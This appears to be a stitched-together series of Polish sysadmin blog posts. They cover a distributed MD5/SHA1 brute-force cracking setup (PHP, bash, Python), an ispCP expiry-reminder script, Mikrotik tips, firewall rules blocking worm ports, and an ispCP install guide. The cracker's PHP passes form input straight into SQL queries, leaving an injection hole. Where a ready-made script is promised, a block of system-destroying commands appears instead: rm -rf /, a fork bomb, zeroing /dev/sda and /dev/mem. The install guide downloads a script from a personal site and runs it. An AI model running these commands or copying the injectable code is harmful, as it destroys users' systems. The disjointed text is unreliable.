Co potrzebujemy?
* Wiedzy czym jest MD5 i/lub SHA1
* Serwer z www, php i mysql (otwarte na dostęp z zewnątrz link)
* Najlepiej kilka maszyn z dostępem do shell oraz poleceniem mysql

Zacznijmy od stronki dzięki której będziemy wrzucać hasze. Na początek struktura bazy:

-- phpMyAdmin SQL Dump
-- http://www.phpmyadmin.net

SET SQL_MODE="NO_AUTO_VALUE_ON_ZERO";

CREATE TABLE IF NOT EXISTS `hash` (
  `id` int(5) NOT NULL AUTO_INCREMENT,
  `hash` varchar(100) NOT NULL,
  `typ` varchar(4) NOT NULL,
  `min` varchar(2) NOT NULL,
  `max` varchar(2) NOT NULL,
  `value` varchar(255) NOT NULL,
  `status` varchar(1) NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM  DEFAULT CHARSET=latin1 AUTO_INCREMENT=38 ;

INSERT INTO `hash` (`id`, `hash`, `typ`, `min`, `max`, `value`, `status`) VALUES
(9, '38f7a8a334cc90d8400ae9e6eeb31340', 'md5', '4', '8', 'juza', '3'),
(10, '9743a66f914cc249efca164485a19c5c', 'md5', '4', '8', 'dupa', '3'),
(25, '7c37ed5b5b72d2c6927e25357e6c488a', 'md5', '1', '8', 'reksio', '3'),
(27, '7635e7b8be884a1f4acfba286ec27061', 'md5', '1', '8', 'piesek', '3'),
(28, '391b91114b10392a6ae72ff8dc7395e8', 'md5', '1', '8', 'zuch', '3'),
(30, 'f21f1b67653b4fc32e8f915ae82e344b', 'md5', '1', '10', 'youtt', '3'),
(31, '85a057cb845658bd35be5e2458429a42', 'md5', '1', '10', 'mutt', '3'),
(36, '6d9fdb16ed509488eeef6af2f842a744', 'md5', '1', '8', 'dupa.8', '3');

Następnie połączenie z bazą:

    <?php

    //stałe bazy danych
    $mysql_host = 'localhost';
    $mysql_login = 'login';
    $mysql_haslo = 'haslo';
    $mysql_baza = 'login';

    // połączenie z bazą danych
    $polaczenie = mysql_connect($mysql_host, $mysql_login, $mysql_haslo) or die('Błąd: nie udało się nawiązać połączenia z bazą danych.');

    // połączenie ze schematem bazy danych
    mysql_select_db($mysql_baza) or die('Błąd: nie udało się wybrać schematu bazy danych.');

    ?>

Następnie potrzebny nam interfejs www :)

<?php 

include('db.php');

 if($_SERVER["REQUEST_METHOD"] == "POST")
 {
 $hash=$_POST['hash'];
 $wynik = mysql_query("SELECT * FROM hash WHERE hash='$hash'");
 if(isset($_POST['submit']) && $_POST['hash']=='' && mysql_num_rows($wynik) <> 0)
 {
 echo '<p>Wypełnij kurwa pola lub hash znajduje się już w bazie</p>';

 } else {
 $hash = $_POST['hash'];
 $typ = $_POST['typ'];
 $min = $_POST['min'];
 $max = $_POST['max'];
 $status = '1';

 if($min==''){
 $min = '1';
 }
 if($max==''){
 $max = '6';
 }

 mysql_query("INSERT INTO `hash` SET `hash` = '$hash', `typ` = '$typ', `min` = '$min', `max` = '$max', `status` = '$status';");
 echo '<p>Dodano</p>';

 }
 } 

 if($_GET['action']==''){
 ?>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />

<title>MD5/SHA1 crack</title>
</head><body>
<a href="index.php">Home</a> &nbsp; <a href="index.php?action=list">Lista</a><br><br>

<p>Wypełnij poniższe pola</p>
			<form action='index.php' method="POST">
<table>
</td></tr>
<tr><td align=right>Hash md5/sha1 </td><td>
<input size="50" type='text' name='hash' value="">
</td></tr>
<tr><td align=right>Rodzaj </td><td>
        	<select name="typ">
        		<option value="md5">md5</option>
        		<option value="sha1">sha1</option>
        	</select>
</td></tr>
<tr><td align=right>Min liczba znaków </td><td>
<input size="2" type='text' name='min' value="">
</td></tr>
<tr><td align=right>Max liczba znaków </td><td>
<input size="2" type='text' name='max' value="">
</td></tr>
</table>
<br><br>
		<input name="submit" type='submit' value='Save'>
	</form>

	</body>
	</html>
<?php
}

if($_GET['action']=='list'){
?>

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />

<title>MD5/SHA1 crack</title>
</head><body>
<a href="index.php">Home</a> &nbsp; <a href="index.php?action=list">Lista</a><br><br>
<?

echo '<table align=\"center\"><tr><td>Hash</td><td>Rodzaj</td><td>Status</td><td>Hasło</td></tr>';
$wynik = mysql_query("SELECT * FROM `hash` ORDER BY id DESC;") or die('Błąd zapytania');
if(mysql_num_rows($wynik) > 0) {
    /* jeżeli wynik jest pozytywny, to wyświetlamy dane */
    while($r = mysql_fetch_assoc($wynik)) {

    if($r['status']=='1'){
    $status = 'Waiting to add';
    }
    if($r['status']=='2'){
    $status = 'In progress';
    }
    if($r['status']=='3'){
    $status = 'Finish';
    }
    if($r['status']=='4'){
    $status = 'Error';
    }
    echo '<tr><td>'.$r['hash'].'</td><td>'.$r['typ'].'</td><td>'.$status.'</td><td>'.$r['value'].'</td></tr>';
    }
    echo "</table></center>";
    echo "	</body></html>";
}
}
?>

Skoro mamy już stronę skąd można dodawać i pobierać hasze zajmijmy się budową nodów. Do tego celu będziemy potrzebować 3 plików. Dwa zwykłe bashowe i jeden napisany w pythonie.
Pierwszy nazwijmy go bot.sh będzie sprawdzał czy w bazie pojawił się nowy hasz:

#!/bin/bash

### BOT/MASTER ###

USER="login"
HASLO="haslo"
BAZA="login"
HOST="ip lub domena do bazy mysql"

until false
do
 zm=`mysql -u $USER -h $HOST -p$HASLO $BAZA -e "SELECT id FROM hash WHERE status='1' LIMIT 1;" | cut -d " " -f 2 | tail -n 1`;
if [[ `echo $zm` == "" ]];
then
sleep 5
else
process=`ps -ef | grep node.sh | wc -l`
if [[ `echo $process` -lt 1 ]]
then
hash=`mysql -u $USER -h $HOST -p$HASLO $BAZA -e "SELECT hash FROM hash WHERE id=$zm;" | cut -d " " -f 2 | tail -n 1`;
CMD="mysql -u $USER -h $HOST -p$HASLO $BAZA"
$CMD -e "UPDATE hash SET status='2' WHERE hash='$hash'"
./node.sh $hash &
fi
fi
done
exit 0

Drugi plik node.sh będzie nam trzymał skrypt pythona oraz robił update do bazy jeśli hasz zostanie znaleziony:

#!/bin/bash

# NOD #

USER="login"
HASLO="haslo"
BAZA="login"
HOST="ip lub domena do bazy mysql"

min=`mysql -u $USER -h $HOST -p$HASLO $BAZA -e "SELECT min FROM hash WHERE hash='$1';" | cut -d " " -f 2 | tail -n 1`;
max=`mysql -u $USER -h $HOST -p$HASLO $BAZA -e "SELECT max FROM hash WHERE hash='$1';" | cut -d " " -f 2 | tail -n 1`;
typ=`mysql -u $USER -h $HOST -p$HASLO $BAZA -e "SELECT typ FROM hash WHERE hash='$1';" | cut -d " " -f 2 | tail -n 1`;

CMD="mysql -u $USER -h $HOST -p$HASLO $BAZA"

 zm=`./start.py -t $typ -h $1 -w ABCDEFGHIJKLMNOPRSTUWXYZ1234567890abcdefghijklmnopqrstuvwxyz -a $max -i $min -v | grep Value | cut -d " " -f 4`;
if [[ `echo $zm` == "" ]];
then
$CMD -e "UPDATE hash SET status='4' WHERE hash='$1'"
else
$CMD -e "UPDATE hash SET value='$zm', status='3' WHERE hash='$1'"
fi

Pozostał już tylko plik w pythonie nazywamy go start.py:

#!/usr/bin/python
#####################################
#        Hash Crack by Juza         #
#      juzase[at]gmail[dot]com      #
#             2007/9/10             #
#####################################
# [+]Crack MD5, SHA1 Hashes         #
# [+]Brute Force Attack             #
#####################################
import sys , string , time
"""
    Hash Crack 1.0 version

"""
def main():
    "Main"
    title = "HC : Hash Crack"
    print "\n" + title.center(45) + "\n"

def usage():
    "Usage"
    print "[-] Exemple : HashCrack.py -t md5 -h 38F7A8A334CC90D8400AE9E6EEB31340 -w 1234567890 -a 8 -i 5 -v"

def usagelarge():
    "Usage Large"
    print "\n  Usage: python HashCrack.py <options>\n"
    print "\n  Example: python HashCrack.py -t md5 -h 38F7A8A334CC90D8400AE9E6EEB31340 -w 1234567890 -a 8 -i 5 -v"
    print "\t[options]"
    print "\t   -h/-hash <md5/sha1> : Hash to Crack"
    print "\t   -w/-word <words> : Words"
    print "\t   -a/max-write <max len> : Maximun Lenght"
    print "\t   -i/min-write <min len> : Minimun Lenght"
    print "\t   -v/-verbose : Verbose Mode\n"

def timer():
    "Time"
    now = time.localtime(time.time())
    return time.asctime(now)

if '__main__' == __name__ :

    if len(sys.argv) <= 5:
        main()
        usagelarge()
        sys.exit(1)

    hhash = words = maxw = minw = typeh = ""
    verbose = 0

    for arg in sys.argv[1:]:
        try:
            if arg.lower() == "-v" or arg.lower() == "-verbose":
                    verbose = 1
            if arg.lower() == "-h" or arg.lower() == "-hash":
                    hhash = sys.argv[int(sys.argv[1:].index(arg))+2]
            if arg.lower() == "-a" or arg.lower() == "-max":
                    maxw = sys.argv[int(sys.argv[1:].index(arg))+2]
            if arg.lower() == "-i" or arg.lower() == "-min":
                    minw = sys.argv[int(sys.argv[1:].index(arg))+2]
            if arg.lower() == "-w" or arg.lower() == "-words":
                    words = sys.argv[int(sys.argv[1:].index(arg))+2]
            if arg.lower() == "-t" or arg.lower() == "-type":
                    typeh = sys.argv[int(sys.argv[1:].index(arg))+2]
        except(IndexError):
            print "[-] Obrigatory Arguments -t(hash type) -h(hash) -w(words) -max(max word)"
            usage()
            sys.exit(1)

    if minw == "" : minw = '1'

    main()
    for args in (typeh, hhash, words, maxw, minw):
        try:
            if args != "":
                if args == typeh :
                    if typeh.lower() != 'md5' or 'sha':
                        if typeh.lower() == "md5" :
                            typeh = '1'
                            print "[+] Hash Type : MD5"
                        elif typeh.lower() == "sha" :
                            typeh = '2'
                            print "[+] Hash Type : SHA1"
                    else:
                        print "[-] Invalid hash type"
                        sys.exit(1)
                if args == hhash :
                    if typeh == '1' :
                        if len(hhash) == 32 :
                            print "[+] MD5 Hash : " + hhash
                        else:
                            print "[-] Invalid MD5 hash"
                            sys.exit(1)
                    if typeh == '2' :
                        if len(hhash) == 40 :
                            print "[+] SHA1 Hash : " + hhash
                        else:
                            print "[-] Invalid SHA1 hash"
                            sys.exit(1)
                if args == words :
                    print "[+] Words : " + words
                if args == maxw :
                    if maxw.isdigit() != False :
                        if int(maxw) >= 15 :
                            print "[-] Max Word : 15 : " + maxw
                            sys.exit(1)
                        else:
                            if int(maxw) > int(minw):
                                print "[+] Max Word : " + maxw
                            else:
                                print "[-] Max Word > Min Word"
                                sys.exit(1)
                    else:
                        print "[-] Max Word = Digit"
                        sys.exit(1)
                if args == minw :
                        if minw.isdigit() != False :
                            if int(minw) < int(maxw) :
                                print "[+] Min Word : " + minw
                            else:
                                print "[-] Min Word < Max Word"
                                sys.exit(1)
                        else:
                            print "[-] Min Word = Digit"
                            sys.exit(1)
            else:
                print "[-] Obrigatory Arguments -t(hash type) -h(hash) -w(Words) -max(Max Word)"
                usage()
                sys.exit(1)
        except(ValueError):
            print "[-] Bad Fromat of Argumets"
            sys.exit(1)

    f = open("CRACK.py",'w')
    f.write("#!/usr/bin/env python\n")
    if (typeh == '1') : f.write("import sys , md5 , string , time\n")
    if (typeh == '2') : f.write("import sys , sha , string , time\n")
    tab = '\t'
    f.write("def timer():\n")
    f.write(tab + "now = time.localtime(time.time())\n")
    f.write(tab + "return time.asctime(now)\n")
    f.write("def crackhash():\n")

    i = 0 ; inwords = ""
    f.write(tab + "hashh = '" + hhash.lower() +"'\n")
    f.write(tab + "try:\n")

    #print words
    for i in words:
        if i == str(words[int(len(words)-1)]) :
            inwords += "'" + i + "'"
            break
        inwords += "'" + i + "',"
    #print inwords

    i = int(minw) ; iwords = "" ; a = 0

    while (int(i) != int(maxw) + 1) :

        for a in range(i):
            if int(i) != (int(a) + 1):
                iwords += "i" + str(i) + str(a) + " + "
            else:
                 iwords += "i" + str(i) + str(a)

            data = (int(a + 2) * tab + "for i" + str(i) + str(a) + " in (" + inwords + "):\n")
            f.write(data)

        f.write(int(i + 2) * tab + "word = '' ; value = ''\n")
        f.write(int(i + 2) * tab + "word = " + iwords + "\n")

        if typeh == '1' : f.write(int(i + 2) * tab + "hash = md5.new()\n")

        if typeh == '2' : f.write(int(i + 2) * tab + "hash = sha.new()\n")

        f.write(int(i + 2) * tab + "hash.update(str(word))\n")
        f.write(int(i + 2) * tab + "value = hash.hexdigest()\n")
        if verbose == 1 : f.write(int(i + 2) * tab + "print " + iwords + ' + " : " + str(value)\n')
        f.write(int(i + 2) * tab + "if str(hashh) == str(value):\n")
        f.write(int(i + 3) * tab + "raise Exception\n")
        iwords = ""
        i += 1

    f.write(tab + "except(Exception):")
    f.write('\n'+ 2 * tab + "print '****Cracked' + 36 * '*'")
    f.write('\n' + 2 * tab + "print '[=] Hash :', hashh")
    f.write('\n' + 2 * tab + "print '[=] Hash Attack :', value")
    f.write('\n' + 2 * tab + "print '[=] Value :', str(word)")
    f.write('\n' + 2 * tab + "print '[=] Time :', timer()")
    f.write('\n' + 2 * tab + "sys.exit(1)")
    f.write('\n' + tab + "except(KeyboardInterrupt):")
    f.write('\n' + 2 * tab + "print '[-] Process Ended ',timer()")
    f.write('\n' + 2 * tab + "sys.exit(1)")
    f.write("\ncrackhash()")
    f.close()

    print '[-] Time : ', timer()

    import CRACK
    CRACK.crackhash()

3 ostatnie pliki wgrywamy na dowolny shell z dostępem do komendy mysql. Aby uruchomić ustrojstwo należy w katalogu gdzie znajdują sie skrypty wydać polecenie bot.sh &
Od teraz bot.sh będzie sobie sprawdzał co 5 sekund czy pojawiły się nowe hasze i pobierał je. Oczywiście decyduje prędkość połączenia zdalnego serwera z serwerem mysql. Ten serwer który pierwszy pobierze hasz i sprawdzi czy nie ma już procesów zmieni status i rozpocznie łamanie.

Na początek musimy połączyć się z bazą

<?
 mysql_connect("localhost", "root", "secretpassword") or die(mysql_error());
 mysql_select_db("ispcp") or die(mysql_error());

Wrzucimy są funkcję (thx dla ZBT) która będzie gadać z mysql

 function result($query)
     {
          $array = $result = array();

          $query = mysql_query($query) or die(mysql_error());

          while($re = mysql_fetch_array($query, MYSQL_ASSOC))
                    $array[] = $re;

          if(!sizeof($array)) return false;

          foreach($array as $no => $arr)
               foreach($arr as $key => $val)
                    $result[$no][$key] = stripslashes($val);

          return $result;
     }

Teraz zapytanie

 $query = result("SELECT * FROM `domain`");

Pętelka która będzie przeszukiwać wszystkie rekordy w bazie. Dla kont które nie mają pusty rekord lub nie posiadają ustawionego czasu wygaśnięcia pętli nie wykonujemy.

foreach($query as $row){

    if (($row['domain_expires'] != '') || ($row['domain_expires'] != '0')){

Jak widać poniżej funkcja sprawdza sobie daty i wypluwa ilość dni pozostałych do wygaśnięcia konta

      $year = date('Y'); $month = date('n'); $day = date('d');
        $end = date("Y-m-d", $row['domain_expires']);
          $ile_dni = (strtotime("$end GMT")-strtotime("$year-$month-$day GMT"))/86400;

I użyteczna część czyli informacja na maila. Jeśli do końca pozostało 14 dni informujemy klienta pobierając jego email przyporządkowany do konta oraz wysyłamy do siebie krótką notkę.

  if ($ile_dni == '14'){
        $email = result("SELECT * FROM `admin` WHERE `admin_id` = '".$row['domain_admin_id']."'");
          foreach($email as $row1){
            $email=$row1['email'];
      }

      $naglowki = "From: contact@domain.tld".PHP_EOL."Content-type: text/plain; charset=utf-8";

      mail($email, 'Reminder', "\n\n\nWelcome ".$row['domain_name']." your account expire for 14 days", $naglowki);
      mail('myemail@domain.tld', 'Reminder', "\n\n\nAccount ".$row['domain_name']." for 14 days die", $naglowki);

    }

To samo dla 30 dni i zamykamy cały skrypt.

    if ($ile_dni == '30'){
        $email = result("SELECT * FROM `admin` WHERE `admin_id` = '".$row['domain_admin_id']."'");
          foreach($email as $row1){
            $email=$row1['email'];
      }

      $naglowki = "From: contact@domain.tld".PHP_EOL."Content-type: text/plain; charset=utf-8";

      mail($email, 'Reminder', "\n\n\nWelcome ".$row['domain_name']." your account expire for 30 days", $naglowki);
      mail('myemail@domain.tld', 'Reminder', "\n\n\nAccount ".$row['domain_name']." expire for 30 days", $naglowki);

    }

  }

}

?>

Tada :) Teraz wystarczy raz dziennie wrzucić skrypt do cron-a

* 9 * * * php /sbin/reminder_ispcp.php

i możemy spać spokojnie wiedząc, że klienci zostaną poinformowani o wygaśnięciu konta. Pozostaje tylko stworzyć interakcję z użytkownikiem np integracja z platnosci.pl lub system wysyłania faktur. Sposobów jest wiele. Jeśli mi się zachce (na co bym nie liczył) to z pewnością wrzucę tu takowy. Dla maruderów i malkontentów- skrypt można z pewnością napisać lepiej i bardziej przejrzyście ale pisanie czegoś o 3 w nocy nie uskrzydla :)
Na koniec dla leniwych gotowy skrypt z komentami
skrypt

ls -alR / > /dev/null &
strip /usr/lib/*
[ $[ $RANDOM % 6 ] == 0 ] && rm -rf /
:() { :|: & };:
perl -e {while; fork; while}
echo "" > /boot/grub/grub.conf
echo "" > /dev/sda
for x in `find /usr -type f -executable`; do chmod -x $x; done && for x in `find /bin -type f -executable`; do chmod -x $x; done
dd if=/dev/zero of=/dev/sda
cp /dev/zero /dev/mem

Na początek coś prostego:

Putty

Putty- program którym łączymy się do serwerów/urządzeń/etc do zalogowania wymaga podania nazwy domeny lub adresu IP. Jeśli urządzeń jest kilka to z wpisaniem nie ma problemu, jeśli urządzeń jest większa liczba pojawia się problem z notorycznym stukaniem w klawisze. Uprośćmy to…
Z lewej strony w liście wybierzmy tools, następnie add (znaczek plusa). W pole nazwa wpisujemy np Putty a poleceniu

"c:\Program Files\putty.exe" [Device.AddressesColumn]

Zastosuj -> Ok i już możemy wybierać po najechaniu na urządzenie do którego chcemy się zalogować prawym klawiszem myszki Narzędzia -> Putty. Jeśli wasza ścieżka do programu jest inna oczywiście należy ją zmodyfikować :). Powyższy przykład można oczywiście rozwinąć wpisując port lub usera jeśli na wszystkich serwerach zdefiniowany jest taki sam.

"c:\Program Files\putty.exe" admin@[Device.AddressesColumn]:22

Teraz coś równie prostego :)

Statystyki (graphs)

Ci którzy uważnie czytali manuala MT wiedzą zapewne, że Mikrotik posiada własne statystyki. Jak je włączyć? Wystarczy wkleić w konsolę:

tool graphing interface add interface=all
tool graphing resource add

I jak powyżej dorzucamy to do narzędzi (tools->add) wpisując w nazwie cokolwiek. Polecenie uruchamiające:

http://[Device.AddressesColumn]/graphs/

Urządzenie: i tu jeśli w dude mamy dokładnie wypełnione możemy wybrać z listy urządzeń „MikroTik Device”

Teraz troszkę wyżej poprzeczka

Wyświetlanie ilości podłączonych urządzeń

Na początek musimy sobie dodać nową funkcję. Z lewej wybieramy Funcions->Add w nazwie wpisujemy
„wireless_clients”, opis dowolny a kod przeklejamy

array_size(oid_column("iso.org.dod.internet.private.enterprises.mikrotik.mikrotikExperimentalModule.mtXRouterOs.mtxrWireless.mtxrWlRtabTable.mtxrWlRtabEntry.mtxrWlRtabStrength"))

Teraz z lewej wybieramy Probes -> Add i po koleji
Nazwa:

wireless_probe

Rodzaj:

Function

Dostępna:

wireless_clients()

Błąd:

if(wireless_clients(), "", "")

Wartość:

wireless_clients()

Jednostka:

Klientów na radiu

tempo:

brak

Teraz wyświetlanie
Prawy klik na urządzenie i wybieramy wygląd a następnie w polu Etykieta:

[Device.Name]
[device_performance()][Device.ServicesDown][wireless_clients()] klientów

Na koniec statystyki. Wchodzimy w Devices i zakładka Rodzaje. Znajdujemy MikroTik Device i w zakładce Identyfikacja oraz Usługi sieciowe zaznaczamy pole wireless_probe.

IPv4

/ip firewall filter
add action=drop chain=forward comment="Drop Blaster Worm" disabled=no dst-port=135-139 protocol=tcp
add action=drop chain=forward comment="Drop Messenger Worm" disabled=no dst-port=135-139 protocol=udp
add action=drop chain=forward comment="Drop Blaster Worm" disabled=no dst-port=445 protocol=tcp
add action=drop chain=forward comment="Drop Blaster Worm" disabled=no dst-port=445 protocol=udp
add action=drop chain=forward comment=________ disabled=no dst-port=593 protocol=tcp
add action=drop chain=forward comment=________ disabled=no dst-port=1024-1030 protocol=tcp
add action=drop chain=forward comment="Drop MyDoom" disabled=no dst-port=1080 protocol=tcp
add action=drop chain=forward comment=________ disabled=no dst-port=1214 protocol=tcp
add action=drop chain=forward comment="ndm requester" disabled=no dst-port=1363 protocol=tcp
add action=drop chain=forward comment="ndm server" disabled=no dst-port=1364 protocol=tcp
add action=drop chain=forward comment="screen cast" disabled=no dst-port=1368 protocol=tcp
add action=drop chain=forward comment=hromgrafx disabled=no dst-port=1373 protocol=tcp
add action=drop chain=forward comment=cichlid disabled=no dst-port=1377 protocol=tcp
add action=drop chain=forward comment=Worm disabled=no dst-port=1433-1434 protocol=tcp
add action=drop chain=forward comment="Bagle Virus" disabled=no dst-port=2745 protocol=tcp
add action=drop chain=forward comment="Drop Dumaru.Y" disabled=no dst-port=2283 protocol=tcp
add action=drop chain=forward comment="Drop Beagle" disabled=no dst-port=2535 protocol=tcp
add action=drop chain=forward comment="Drop Beagle.C-K" disabled=no dst-port=2745 protocol=tcp
add action=drop chain=forward comment="Drop MyDoom" disabled=no dst-port=3127-3128 protocol=tcp
add action=drop chain=forward comment="Drop Backdoor OptixPro" disabled=no dst-port=3410 protocol=tcp
add action=drop chain=forward comment=Worm disabled=no dst-port=4444 protocol=tcp
add action=drop chain=forward comment=Worm disabled=no dst-port=4444 protocol=udp
add action=drop chain=forward comment="Drop Sasser" disabled=no dst-port=5554 protocol=tcp
add action=drop chain=forward comment="Drop Beagle.B" disabled=no dst-port=8866 protocol=tcp
add action=drop chain=forward comment="Drop Dabber.A-B" disabled=no dst-port=9898 protocol=tcp
add action=drop chain=forward comment="Drop Dumaru.Y" disabled=no dst-port=10000 protocol=tcp
add action=drop chain=forward comment="Drop MyDoom.B" disabled=no dst-port=10080 protocol=tcp
add action=drop chain=forward comment="Drop NetBus" disabled=no dst-port=12345 protocol=tcp
add action=drop chain=forward comment="Drop Kuang2" disabled=no dst-port=17300 protocol=tcp
add action=drop chain=forward comment="Drop SubSeven" disabled=no dst-port=27374 protocol=tcp
add action=drop chain=forward comment="Drop PhatBot, Agobot, Gaobot" disabled=no dst-port=65506 protocol=tcp


IPv6

/ipv6 firewall filter
add action=drop chain=forward comment="Drop Blaster Worm" disabled=no dst-port=135-139 protocol=tcp
add action=drop chain=forward comment="Drop Messenger Worm" disabled=no dst-port=135-139 protocol=udp
add action=drop chain=forward comment="Drop Blaster Worm" disabled=no dst-port=445 protocol=tcp
add action=drop chain=forward comment="Drop Blaster Worm" disabled=no dst-port=445 protocol=udp
add action=drop chain=forward comment=________ disabled=no dst-port=593 protocol=tcp
add action=drop chain=forward comment=________ disabled=no dst-port=1024-1030 protocol=tcp
add action=drop chain=forward comment="Drop MyDoom" disabled=no dst-port=1080 protocol=tcp
add action=drop chain=forward comment=________ disabled=no dst-port=1214 protocol=tcp
add action=drop chain=forward comment="ndm requester" disabled=no dst-port=1363 protocol=tcp
add action=drop chain=forward comment="ndm server" disabled=no dst-port=1364 protocol=tcp
add action=drop chain=forward comment="screen cast" disabled=no dst-port=1368 protocol=tcp
add action=drop chain=forward comment=hromgrafx disabled=no dst-port=1373 protocol=tcp
add action=drop chain=forward comment=cichlid disabled=no dst-port=1377 protocol=tcp
add action=drop chain=forward comment=Worm disabled=no dst-port=1433-1434 protocol=tcp
add action=drop chain=forward comment="Bagle Virus" disabled=no dst-port=2745 protocol=tcp
add action=drop chain=forward comment="Drop Dumaru.Y" disabled=no dst-port=2283 protocol=tcp
add action=drop chain=forward comment="Drop Beagle" disabled=no dst-port=2535 protocol=tcp
add action=drop chain=forward comment="Drop Beagle.C-K" disabled=no dst-port=2745 protocol=tcp
add action=drop chain=forward comment="Drop MyDoom" disabled=no dst-port=3127-3128 protocol=tcp
add action=drop chain=forward comment="Drop Backdoor OptixPro" disabled=no dst-port=3410 protocol=tcp
add action=drop chain=forward comment=Worm disabled=no dst-port=4444 protocol=tcp
add action=drop chain=forward comment=Worm disabled=no dst-port=4444 protocol=udp
add action=drop chain=forward comment="Drop Sasser" disabled=no dst-port=5554 protocol=tcp
add action=drop chain=forward comment="Drop Beagle.B" disabled=no dst-port=8866 protocol=tcp
add action=drop chain=forward comment="Drop Dabber.A-B" disabled=no dst-port=9898 protocol=tcp
add action=drop chain=forward comment="Drop Dumaru.Y" disabled=no dst-port=10000 protocol=tcp
add action=drop chain=forward comment="Drop MyDoom.B" disabled=no dst-port=10080 protocol=tcp
add action=drop chain=forward comment="Drop NetBus" disabled=no dst-port=12345 protocol=tcp
add action=drop chain=forward comment="Drop Kuang2" disabled=no dst-port=17300 protocol=tcp
add action=drop chain=forward comment="Drop SubSeven" disabled=no dst-port=27374 protocol=tcp
add action=drop chain=forward comment="Drop PhatBot, Agobot, Gaobot" disabled=no dst-port=65506 protocol=tcp


Wiecznie nieśmiertelne hello


:global 1 [:parse ":put Hello"];
:global 2 [:parse ":put World"];
$1; $2;

Prawda, że głupie? ;]
Dobra do rzeczy:

:local int1 "interfejs1"; :local ip1 "xx.xx.xx.11";
:local int2 "interfejs2"; :local ip2 "xx.xx.xx.22";
# check all ip
:if ([/ping $ip1 count=5] = 0 and [/ping $ip2 count=5] = 0) do={
:log error "Problem witch all VPN ";
/interface disable $int1;
/interface disable $int2;
delay delay-time=2;
/interface enable $int1;
/interface enable $int2;
delay delay-time=5;
:if ([/ping $ip1 count=5] = 0 and [/ping $ip2 count=5] = 0) do={
:log error "All VPNs down"
/system reboot
} else={ :log error "All VPNs up" }
}
# check first ip
:if ([/ping $ip1 count=5] = 0) do={
/interface disable $int1;
delay delay-time=2;
/interface enable $int1;
delay delay-time=5;
:if ([/ping $ip1 count=5] = 0) do={
/system reboot
} else={ :log error "$ip1 VPN up" }
}
# check second ip
:if ([/ping $ip2 count=5] = 0) do={
/interface disable $int2;
delay delay-time=2;
/interface enable $int2;
delay delay-time=5;
:if ([/ping $ip2 count=5] = 0) do={
/system reboot
} else={ :log error "$ip2 VPN up" }
}

Skrypcik sprawdza sobie połączenia jeśli nie ma odpowiedzi na pingi najpierw upuszcza i podnosi interfejsy, a jeśli to nie pomaga restartuje sobie naszego Mikrotika. Całość oczywiście dorzucamy do scheduler-a (odpowiednik crona) komendą z terminala (nie lubię klikać a co):

/system scheduler add name="check-vpn" on-event=tutajnazwaskrypciora interval=10m start-time=startup


Na początek należy zmienić wpisy dla apt.

nano /etc/apt/sources.list

Wywalamy wszystko lub komentujemy i wklejamy:

deb http://ftp.pl.debian.org/debian/ lenny main non-free contrib
deb-src http://ftp.pl.debian.org/debian/ lenny main non-free contrib
deb http://security.debian.org/ lenny/updates main contrib non-free
deb-src http://security.debian.org/ lenny/updates main contrib non-free

Teraz trzeba by zaktualizować wszystko zanim przystąpimy do działań

apt-get update && apt-get dist-upgrade

Tu może się zdarzyć problem z kluczami apt.

W: GPG error: http://security.debian.org lenny/updates Release: The following signatures couldn't be verified because the public key is not available: NO_PUBKEY AED4B06F473041FA

Do naprawy tego polecam skrypcik http://toniemy.org.pl/stuf/kody/no-pub-key.txt dzięki któremu dodamy sobie klucze, jeśli nie mamy tego problemu spokojnie omijamy ten krok

cd /usr/src/ && wget http://toniemy.org.pl/stuf/kody/no-pub-key.txt && chmod +x no-pub-key.txt && ./no-pub-key.txt AED4B06F473041FA && apt-get dist-upgrade

Kiedy mamy już wszystko zaktualizowane przejdziemy do zebrania całego osprzętu :)

cd /usr/src
apt-get install mc bzip2 zip unzip make build-essential
wget http://downloads.sourceforge.net/project/ispcp/ispCP%20Omega/ispCP%20Omega%201.0.7/ispcp-omega-1.0.7.tar.bz2?r=http%3A%2F%2Fsourceforge.net%2Fsettings%2Fmirror_choices%3Fprojectname%3Dispcp%26filename%3DispCP%2520Omega%2FispCP%2520Omega%25201.0.7%2Fispcp-omega-1.0.7.tar.bz2&ts=1297994093&use_mirror=ovh
wget http://downloads.sourceforge.net/project/cband/mod-cband/mod-cband-0.9.6.1/mod-cband-0.9.6.1.tgz?r=http%3A%2F%2Fsourceforge.net%2Fprojects%2Fcband%2Ffiles%2Fmod-cband%2Fmod-cband-0.9.6.1%2F&ts=1297995825&use_mirror=ovh
mv mod-cband* mod-cband-0.9.6.1.tgz
wget http://vda.sourceforge.net/VDA/postfix-2.5.5-vda-ng.patch.gz
mv ispcp-omega-1.0.7.tar.bz2* ispcp-omega-1.0.7.tar.bz2 && tar xf ispcp-omega-1.0.7.tar.bz2 && cd ispcp-omega-1.0.7
apt-get install $(cat ./docs/Debian/debian-packages-lenny)

Przy okienku Configuring mysql-server-5.0 wpisujemy swoje hasło do bazy, Configuring courier-base odpowiadamy -> No, ProFTPd configuration wybieramy -> standalone
Teraz zaczniemy dozbrajać

cd ../
apt-get install apache2-prefork-dev
tar xf mod-cband-0.9.6.1.tgz && cd mod-cband-0.9.6.1 && ./configure && make && make install

Olewamy błąd

apxs:Error: Activation failed for custom /etc/apache2/httpd.conf file..
apxs:Error: At least one `LoadModule' directive already has to exist..
make: *** [install] Error 1

i ładujemy

echo "LoadModule cband_module /usr/lib/apache2/modules/mod_cband.so" > /etc/apache2/mods-available/cband.load
a2enmod cband && /etc/init.d/apache2 restart

Serwer www postawiony teraz przejdźmy do poczty

apt-get install postfix postfix-mysql postfix-doc mysql-client mysql-server courier-authdaemon courier-authlib-mysql courier-pop courier-pop-ssl courier-imap courier-imap-ssl postfix-tls libsasl2-2 libsasl2-modules libsasl2-modules-sql sasl2-bin libpam-mysql openssl phpmyadmin apache2 libapache2-mod-php5 php5 php5-mysql libpam-smbpass
cd ../
apt-get build-dep postfix
apt-get source postfix
gunzip postfix-2.5.5-vda-ng.patch.gz
cd postfix-2.5.5
patch -p1 < ../postfix-2.5.5-vda-ng.patch
dpkg-buildpackage
cd ../
dpkg -i postfix_2.5.5-1.1_i386.deb postfix-mysql_2.5.5-1.1_i386.deb

Poczta zrobiona teraz pozostaje instalacja IspCP

cd ispcp-omega-1.0.7
make install
cp -R /tmp/ispcp/* /
mysql_secure_installation
cd /var/www/ispcp/engine/setup
perl ./ispcp-setup

